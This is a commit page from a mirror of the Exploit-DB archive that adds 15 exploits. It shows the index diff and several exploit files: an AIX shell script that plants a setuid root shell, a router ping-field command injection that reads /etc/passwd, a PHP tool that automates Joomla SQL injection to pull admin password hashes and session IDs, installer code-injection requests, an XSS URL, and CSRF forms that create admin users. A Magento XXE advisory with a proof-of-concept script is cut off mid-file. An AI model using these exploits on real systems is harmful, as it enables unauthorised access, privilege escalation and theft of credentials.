bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-10-31

Browse source 
15 new exploits
This commit is contained in:
Offensive Security 2015-10-31 05:02:40 +00:00
parent 0c7dacc4a3
commit 6dfa3e2539
17 changed files with 1402 additions and 206 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

18
files.csv
View file

@ -33625,6 +33625,7 @@ id,file,description,date,author,platform,type,port
37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80 37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80 37266,platforms/php/webapps/37266.txt,"ClickHeat <= 1.14 Change Admin Password CSRF",2015-06-12,"David Shanahan",php,webapps,80
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0 37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0 37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
@ -34809,13 +34810,15 @@ id,file,description,date,author,platform,type,port
38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0 38526,platforms/windows/remote/38526.py,"Easy File Sharing Web Server 7.2 - Remote SEH Based Overflow",2015-10-23,Audit0r,windows,remote,0
38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0 38527,platforms/php/webapps/38527.txt,"Realtyna RPL Joomla Extension 8.9.2 - Multiple SQL Injection Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0 38528,platforms/php/webapps/38528.txt,"Realtyna RPL Joomla Extension 8.9.2 - Persistent XSS And CSRF Vulnerabilities",2015-10-23,"Bikramaditya Guha",php,webapps,0
38572,platforms/php/webapps/38572.txt,"PHP Server Monitor 3.1.1- Multiple CSRF Vulnerabilities",2015-10-30,hyp3rlinx,php,webapps,0
38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0 38532,platforms/windows/local/38532.py,"Alreader 2.5 .fb2 - SEH Based Stack Overflow (ASLR and DEP bypass)",2015-10-25,g00dv1n,windows,local,0
38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0 38533,platforms/windows/local/38533.c,"Windows 10 - pcap Driver Local Privilege Escalation",2015-10-26,Rootkitsmm,windows,local,0
38534,platforms/php/webapps/38534.php,"Joomla 3.2.x - 3.4.4 - SQL Injection",2015-10-26,"Manish Tanwar",php,webapps,0
38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0 38535,platforms/osx/remote/38535.rb,"Safari User-Assisted Applescript Exec Attack",2015-10-26,metasploit,osx,remote,0
38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0 38538,platforms/multiple/dos/38538.py,"Code::Blocks Denial of Service Vulnerability",2013-05-29,ariarat,multiple,dos,0
38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0 38540,platforms/osx/local/38540.rb,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-27,metasploit,osx,local,0
38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80 38541,platforms/php/remote/38541.rb,"Th3 MMA mma.php Backdoor Arbitrary File Upload",2015-10-27,metasploit,php,remote,80
38542,platforms/windows/dos/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,dos,0 38542,platforms/windows/local/38542.cpp,"Win10Pcap - Local Privilege Escalation Vulnerability",2015-10-27,R00tkitSMM,windows,local,0
38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0 38543,platforms/php/webapps/38543.txt,"php4dvd 'config.php' PHP Code Injection Vulnerability",2012-05-31,"CWH Underground",php,webapps,0
38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0 38544,platforms/php/webapps/38544.txt,"Elastix Multiple Cross Site Scripting Vulnerabilities",2013-05-28,cheki,php,webapps,0
38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0 38545,platforms/php/webapps/38545.txt,"Telaen 2.7.x Cross Site Scripting Vulnerability",2013-06-04,"Manuel García Cárdenas",php,webapps,0
@ -34839,3 +34842,16 @@ id,file,description,date,author,platform,type,port
38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0 38564,platforms/windows/dos/38564.py,"Sam Spade 1.14 - Scan From IP Address Field SEH Overflow Crash PoC",2015-10-29,"Luis Martínez",windows,dos,0
38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80 38565,platforms/php/webapps/38565.txt,"Joomla JNews (com_jnews) Component 8.5.1 - SQL Injection",2015-10-29,"Omer Ramić",php,webapps,80
38566,platforms/hardware/dos/38566.py,"NetUSB Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0 38566,platforms/hardware/dos/38566.py,"NetUSB Kernel Stack Buffer Overflow",2015-10-29,"Adrián Ruiz Bermudo",hardware,dos,0
38567,platforms/php/webapps/38567.txt,"Max Forum Multiple Security Vulnerabilities",2013-06-09,"CWH Underground",php,webapps,0
38568,platforms/php/webapps/38568.txt,"WordPress Ambience Theme 'src' Parameter Cross Site Scripting Vulnerability",2013-06-09,Darksnipper,php,webapps,0
38569,platforms/php/webapps/38569.txt,"Lokboard 'index_4.php' PHP Code Injection Vulnerability",2013-06-10,"CWH Underground",php,webapps,0
38570,platforms/php/webapps/38570.txt,"ScriptCase 'scelta_categoria.php' SQL Injection Vulnerability",2013-06-10,"Hossein Hezami",php,webapps,0
38571,platforms/php/webapps/38571.txt,"mkCMS 'index.php' Arbitrary PHP Code Execution Vulnerability",2013-06-11,"CWH Underground",php,webapps,0
38573,platforms/php/webapps/38573.txt,"eBay Magento <= 1.9.2.1 - PHP FPM XML eXternal Entity Injection",2015-10-30,"Dawid Golunski",php,webapps,0
38574,platforms/php/webapps/38574.html,"PHP Server Monitor 3.1.1- CSRF Privilege Escalation",2015-10-30,hyp3rlinx,php,webapps,0
38575,platforms/hardware/webapps/38575.txt,"Hitron Router CGN3ACSMR 4.5.8.16 - Arbitrary Code Execution",2015-10-30,"Dolev Farhi",hardware,webapps,0
38576,platforms/aix/local/38576.sh,"AIX 7.1 - lquerylv Local Privilege Escalation",2015-10-30,"S2 Crew",aix,local,0
38577,platforms/php/webapps/38577.txt,"Pligg CMS 2.0.2 - Multiple SQL Injection Vulnerabilities",2015-10-30,"Curesec Research Team",php,webapps,0
38578,platforms/php/webapps/38578.txt,"Pligg CMS 2.0.2 - Directory Traversal",2015-10-30,"Curesec Research Team",php,webapps,0
38579,platforms/php/webapps/38579.txt,"Pligg CMS 2.0.2 - CSRF Code Execution",2015-10-30,"Curesec Research Team",php,webapps,0
38581,platforms/php/webapps/38581.txt,"Oxwall 1.7.4 - CSRF Vulnerability",2015-10-30,"High-Tech Bridge SA",php,webapps,0

Can't render this file because it is too large.

28
platforms/aix/local/38576.sh Executable file
View file

@ -0,0 +1,28 @@
#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: -
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;)
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell

45
platforms/hardware/webapps/38575.txt Executable file
View file

@ -0,0 +1,45 @@
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution
# Author: Dolev Farhi (dolevf at protonmail.ch)
# Date: 29-10-2015
# Vendor homepage: http://www.hitrontech.com/en/index.php
# Software version: 4.5.8.16
# Hardware version: 1A
# Details:
Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
This interface is vulnerable to code injection using the && argument after the IP address.
# Steps to reproduce:
1. Navigate to the dashboard
2. Navigate to the admin tab
3. Type an ip address in the Destination form
4. append any code you want after the ip.
Example one:
8.8.8.8 && cat /etc/passwd
Result
root:$1$27272727:0:0::/:/bin/false
nobody:$1$27272727:65535:65535::/:/bin/false
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
=============Complete==============
Example two:
8.8.8.8 && ip a
PID USER VSZ STAT COMMAND
1 root 1268 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
5 root 0 SW [kworker/u:0]
6 root 0 SW< [khelper]
7 root 0 SW [irq/74-hw_mutex]
8 root 0 SW [sync_supers]
9 root 0 SW [bdi-default]
10 root 0 SW< [kblockd]
11 root 0 SW< [gPunitWorkqueue]
12 root 0 SW [irq/79-punit_in]
13 root 0 SW [kswapd0]
14 root 0 SW< [crypto]

231
platforms/php/webapps/38534.php Executable file
View file

@ -0,0 +1,231 @@
<?php session_start();
error_reporting(0);
set_time_limit(0);
$head = '
<html>
<head>
<link href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTLfLXmLeMSTt0jOXREfgvdp8IYWnE9_t49PpAiJNvwHTqnKkL4" rel="icon" type="image/x-icon"/>
</script>
<title>--==[[Mannu joomla SQL Injection exploiter by Team Indishell]]==--</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<STYLE>
body {
font-family: Tahoma;
color: white;
background: #444444;
}
input {
border : solid 2px ;
border-color : black;
BACKGROUND-COLOR: #444444;
font: 8pt Verdana;
color: white;
}
submit {
BORDER: buttonhighlight 2px outset;
BACKGROUND-COLOR: Black;
width: 30%;
color: #FFF;
}
#t input[type=\'submit\']{
COLOR: White;
border:none;
BACKGROUND-COLOR: black;
}
#t input[type=\'submit\']:hover {
BACKGROUND-COLOR: #ff9933;
color: black;
}
tr {
BORDER: dashed 1px #333;
color: #FFF;
}
td {
BORDER: dashed 0px ;
}
.table1 {
BORDER: 0px Black;
BACKGROUND-COLOR: Black;
color: #FFF;
}
.td1 {
BORDER: 0px;
BORDER-COLOR: #333333;
font: 7pt Verdana;
color: Green;
}
.tr1 {
BORDER: 0px;
BORDER-COLOR: #333333;
color: #FFF;
}
table {
BORDER: dashed 2px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: #191919;;
color: #FFF;
}
textarea {
border : dashed 2px #333;
BACKGROUND-COLOR: Black;
font: Fixedsys bold;
color: #999;
}
A:link {
border: 1px;
COLOR: red; TEXT-DECORATION: none
}
A:visited {
COLOR: red; TEXT-DECORATION: none
}
A:hover {
color: White; TEXT-DECORATION: none
}
A:active {
color: white; TEXT-DECORATION: none
}
</STYLE>
<script type="text/javascript">
<!--
function lhook(id) {
var e = document.getElementById(id);
if(e.style.display == \'block\')
e.style.display = \'none\';
else
e.style.display = \'block\';
}
//-->
</script>
';
echo $head ;
echo '
<table width="100%" cellspacing="0" cellpadding="0" class="tb1" >
<td width="100%" align=center valign="top" rowspan="1">
<font color=#ff9933 size=5 face="comic sans ms"><b>--==[[ Mannu, Joomla </font><font color=white size=5 face="comic sans ms"><b>SQL Injection exploiter By Team </font><font color=green size=5 face="comic sans ms"><b> INDIShEll]]==--</font> <div class="hedr">
<td height="10" align="left" class="td1"></td></tr><tr><td
width="100%" align="center" valign="top" rowspan="1"><font
color="red" face="comic sans ms"size="1"><b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font><br><font color=white>
-==[[Greetz to]]==--</font><br> <font color=#ff9933>Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indisHell,Baba ,Silent poison India,Magnum sniper,ethicalnoob IndisHell,Local root indisHell,Irfninja indisHell<br>Reborn India,L0rd Crus4d3r,cool toad,Hackuin,Alicks,Dinelson Amine,Th3 D3str0yer,SKSking,rad paul,Godzila,mike waals,zoo zoo,cyber warrior,Neo hacker ICA<br>cyber gladiator,7he Cre4t0r,Cyber Ace, Golden boy INDIA,Ketan Singh,Yash,Aneesh Dogra,AR AR,saad abbasi,hero,Minhal Mehdi ,Raj bhai ji , Hacking queen ,lovetherisk and rest of TEAM INDISHELL<br>
<font color=white>--==[[Love to]]==--</font><br># My Father , my Ex Teacher,cold fire HaCker,Mannu, ViKi,Suriya Cyber Tyson ,Ashu bhai ji,Soldier Of God,almas malik, Bhuppi,Mohit, Ffe ^_^,Ashish,Shardhanand,Govind singh,Budhaoo,Don(Deepika kaushik) and acche bacchi(Jagriti) <br>
<font color=white>--==[[Interface Desgined By]]==--</font><br><font color=red>GCE College ke DON :D</font> <br></font>
<b>
<font color=#ff9933>
##########################################</font><font color=white>#############################################</font><font color=green>#############################################</font>
</table>
</table> <br>
';
?>
<div align=center>
<form method=post>
<input type=input name=in value=target>
<input type=submit name=sm value="check version">
<?php
function data($lu)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $lu);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);
curl_close($ch);
return $result['EXE'];
}
if(isset($_POST['sm']))
{
$target=trim($_POST['in']);
$finalurl=$target."/language/en-GB/en-GB.xml";
$data=file_get_contents($finalurl);
$ar0=explode("<version>", $data);
$ar1=explode("</version>", $ar0[1]);
$ar=trim($ar1[0]);
echo "<br>";
$v=explode(".",$ar);
if($v[0]<=3)
{
//echo "<br><br> Joomla version is 3.*.*";
//echo "<br> yes yes >:D<, fas gaya billu ";
echo "<br>click below button to exploit it :v <br><br>" ;
echo "<form method=post><input type=hidden name=tar value=".$target.">";
echo "<input type=submit name=sm1 value=\"Chal billu, ghuma de soday ne xD\">";
}
else{
echo "joomla version is below 3";
}
}
if(isset($_POST['sm1']))
{
$tar=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(password))+from+icalab_users+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";
$dat=data($tar);
$ar0=explode("LEFT JOIN", $dat);
$ar1=explode("_users", $ar0[1]);
$ar=trim($ar1[0]);
$rt=str_replace("icalab",$ar,$tar);
$tr=data($rt);
$ar0=explode("Duplicate entry", $tr);
$ar1=explode("for key", $ar0[1]);
$rt2=str_replace("password","username,0x7e",$rt);
$tr2=data($rt2);
$ar2=explode("Duplicate entry", $tr2);
$ar3=explode("for key", $ar2[1]);
if($ar3[0]!='' && $ar1[0]!='')
{
echo "<br><br> Target gone 8-)<br><br>website name:- ".$_POST['tar']." <br>-------------------------------<br> <br>";
echo "username is --> ".str_replace("~1","",trim($ar3[0]))." <br>Password Hash is --> ".str_replace("~1","",trim($ar1[0]));
echo "<br>Admin session ID is<br></div>";
$sessionid=$_POST['tar']."/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select+1+from+(select+count(*),+concat((select+(select+concat(session_id))+from+".$ar."_session+where+username='admin'+LIMIT+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)";
$ses=data($sessionid);
$ar0=explode("Duplicate entry", $ses);
$ar1=explode("for key", $ar0[1]);
echo trim($ar1[0]);
}
}
?>
<!-- 3.2.* to 3.4.4 -->

44
platforms/php/webapps/38567.txt Executable file
View file

@ -0,0 +1,44 @@
source: http://www.securityfocus.com/bid/60455/info
Max Forum is prone to multiple input-validation vulnerabilities including a PHP code-execution vulnerability, a local file-include vulnerability and an information-disclosure because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to inject arbitrary PHP code and include and execute arbitrary files from the vulnerable system in the context of the affected application and to obtain sensitive information that may aid in further attacks.
Max Forum 2.0.0 is vulnerable; other versions may also be affected.
PHP code-execution:
POST /Max/install/install.php?step=4 HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example/Max/install/install.php?step=3
Cookie: exp_lang=en; language=english; max_name=admin; max_password=2d6df19ab196f1c344310e0021239a06; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
mysql_host=www.example&mysql_login=root&mysql_pass=toor&mysql_database=max&db_prefix=max_%22%3Bphpinfo%28%29%3B%2F%2F&site_address=http%3A%2F%2Fwww.example%2FMax%2F&step=4&prev_step=3
Local file-include:
GET /Max/install/ HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: language=../../phpinfo; lang=en_US; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97
Connection: keep-alive
Information-disclosure:
GET /Max/index.php?forum=2 HTTP/1.1
Host: www.example
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: max_name=admin; max_password=dfbb72b7a33b97abda905a4af7e6c7f5; PHPSESSID=ver2j0fvv4tb98e3cupdulrd97; lang=
Connection: keep-alive

7
platforms/php/webapps/38568.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/60458/info
The Ambience theme for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/wp-content/themes/ambience/thumb.php?src=<body onload=alert(/darksnipper/)>.jpg

20
platforms/php/webapps/38569.txt Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/60459/info
Lokboard is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Lokboard 1.1 is vulnerable; other versions may also be affected.
POST /lokboard/install/index_4.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/lokboard/install/index_3.php?error=1
Cookie: lang=; PHPSESSID=g4j89f6110r4hpl3bkecfpc7c1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
host=localhost&user=root&pass=toor&name=lokboard&pass_key=1234";phpinfo();//

7
platforms/php/webapps/38570.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/60461/info
ScriptCase is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/scelta_categoria.php?categoria=[SQLi]

9
platforms/php/webapps/38571.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/60488/info
mkCMS is prone to an arbitrary PHP code-execution vulnerability.
An attacker can exploit this issue to execute arbitrary PHP code within the context of the affected application.
mkCMS 3.6 is vulnerable; other versions may also be affected.
http://www.example.com/mkCMS/index.php?cmd=dir

167
platforms/php/webapps/38572.txt Executable file
View file

@ -0,0 +1,167 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-PHPSRVMONITOR-CSRF.txt
Vendor:
================================
www.phpservermonitor.org
sourceforge.net/projects/phpservermon/files/phpservermon/PHP%20Server%20Monitor%20v3.1.1/phpservermon-3.1.1.zip/download
Product:
================================
PHP Server Monitor 3.1.1
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
Vulnerability Details:
=====================
Multiple CSRF issues in PHP Server Monitor allow remote attackers to add
arbitrary users & servers to the system, modify system configurations
and delete arbitrary servers, if user (admin) is logged in and visits our
malicious website or clicks on our infected linxs. As no CRSF protection is
used in the application, we can make request on the victims behalf an the
server will happily oblige processing our malicous HTTP requests.
Exploit code(s):
===============
<!DOCTYPE>
<html>
<body onLoad="doit()">
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
1) add arbitrary users to the system:
<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=user&action=save&id=0"
method="post">
<input type="text" name="user_name" value="hyp3rlinx" >
<input type="text" name="name" value="hyp3rlinx">
<input type="text" name="level" value="20">
<input type="text" name="password" value="abc123">
<input type="text" name="password_repeat" value="abc123">
<input type="text" name="email" value="ghostofsin@abyss.com">
<input type="text" name="mobile" value="">
<input type="text" name="pushover_key" value="">
<input type="text" name="pushover_device" value="">
</form>
2) add arbitrary servers to the system:
<form id="HELL" action="
http://localhost/phpservermon-3.1.1/?&mod=server&action=save&id=0&back_to="
method="post">
<input type="text" name="label" value="HELL" >
<input type="text" name="ip" value="malicious-domain.hell">
<input type="text" name="type" value="service">
<input type="text" name="port" value="666">
<input type="text" name="pattern" value="">
<input type="text" name="warning_threshold" value="1">
<input type="text" name="timeout" value="">
<input type="text" name="active" value="yes">
<input type="text" name="email" value="yes">
<input type="text" name="sms" value="yes">
<input type="text" name="pushover" value="yes">
</form>
3) modify system configuration:
<form id="HELL" action="
http://localhost/phpservermon-3.1.1/index.php?mod=config&action=save"
method="post">
<input type="text" name="language" value="en_US" >
<input type="text" name="show_update%5B%5D=" value="on">
<input type="text" name="auto_refresh_servers" value="0">
<input type="text" name="alert_type" value="status">
<input type="text" name="log_status%5B%5D" value="on">
<input type="text" name="log_retention_period" value="1">
<input type="text" name="email_status%5B%5D" value="on">
<input type="text" name="log_email%5B%5D" value="on">
<input type="text" name="email_from_name" value="ghostofsin">
<input type="text" name="email_from_email" value="abysmalgodz@abyss.com">
<input type="text" name="email_smtp_port" value="25">
<input type="text" name="email_smtp_security" value="">
<input type="text" name="email_smtp_username" value="">
<input type="text" name="email_smtp_password" value="">
<input type="text" name="test_email" value="1">
<input type="text" name="log_sms%5B%5D" value="on">
<input type="text" name="sms_gateway" value="whatever">
<input type="text" name="sms_gateway_username" value="username">
<input type="text" name="sms_gateway_password" value="password">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="test_sms" value="0">
<input type="text" name="sms_from" value="1234567890">
<input type="text" name="log_pushover%5B%5D" value="0">
<input type="text" name="pushover_api_token" value="">
<input type="text" name="test_pushover" value="0">
</form>
</body>
</html>
4) arbitrary server deletion via GET request:
http://localhost/sectest/phpservermon-3.1.1/?&mod=server&action=delete&id=2
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Oct 30, 2015 : Public Disclosure
Description:
==========================================================
Request Method(s): [+] GET / POST
Vulnerable Product: [+] PHP Server Monitor 3.1.1
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

422
platforms/php/webapps/38573.txt Executable file
View file

@ -0,0 +1,422 @@
=============================================
- Release date: 29.10.2015
- Discovered by: Dawid Golunski
- Severity: High/Critical
- eBay Magento ref.: APPSEC-1045
=============================================
I. VULNERABILITY
-------------------------
eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM
eBay Magento EE <= 1.14.2.1
II. BACKGROUND
-------------------------
- eBay Magento eCommerce
http://magento.com/
"More than 240,000 merchants worldwide put their trust in our eCommerce
software. Magento's eCommerce platform gives you the tools you need to attract
more prospects, sell more products, and make more money. It's what we do.
We're owned by eBay, so you know we're eCommerce experts"
- PHP FPM
http://php.net/manual/en/install.fpm.php
"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with
some additional features (mostly) useful for heavy-loaded sites."
Starting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI
process manager into its codebase.
III. INTRODUCTION
-------------------------
eBay Magento eCommerce application uses Zend Framework which has a
vulnerability that allows for XML eXternal Entity injection in applications
served with PHP FPM.
XXE (XML eXternal Entity) attack is an attack on an application that parses XML
input from untrusted sources using incorrectly configured XML parser.
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues on PHP applications may also lead to denial of service or
in some cases (e.g. when an 'expect' PHP module is installed) lead to command
execution.
IV. DESCRIPTION
-------------------------
The aforementioned XXE vulnerability in Zend Framework which affects eBay
Magento, was discovered by Dawid Golunski and can be found in a separate
advisory at:
http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt
In short, the Zend Framework XXE vulnerability stems from an insufficient
sanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP
applications.
By using certain multibyte encodings within XML, it is possible to bypass
the sanitisation and perform certain XXE attacks.
Since eBay Magento is based on Zend Framework and uses several of its XML
classes, it also inherits this XXE vulnerability.
The vulnerability in Zend affects all its XML components, however there
are two vulnerable Zend Framework vulnerable components:
- Zend_XmlRpc_Server
- Zend_SOAP_Server
that are of special interest to attackers as they could be exploited remotely
without any authentication.
Magento implements a store API providing XML/SOAP web services.
Although the Zend_XmlRpc is present within Magento code base, the testing
revealed that an older zend class was use for its implementation, which was
not vulnerable.
However, further testing revealed that Magento SOAP API was implemented using
the Zend_SOAP_Server class from Zend Framework, which is vulnerable to the
XXE injection vulnerability discovered earlier.
V. PROOF OF CONCEPT
-------------------------
Normally, when an XML containing entities is supplied to magento SOAP API, the
following message gets produced:
<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>
<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE
attacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope>
Below is a POC exploit that automates the steps necessary to bypass this
protection on Magento served with PHP-FPM, and remotely exploit the XXE issue
in Magento's SOAP API.
---[ magento-soap-exploit.sh ]---
#!/bin/bash
#
# POC Exploit
# eBay Magento - XML eXternal Entity Injection (XXE) via SOAP API
# <= 1.9.2.1
#
# Credits:
#
# Dawid Golunski
# dawid (at) legalhackers.com
# http://legalhackers.com
#
# Usage:
#
# [Vulnerability test]
#
# This is to test the vulnerability with a simple XXE payload which retrieves the
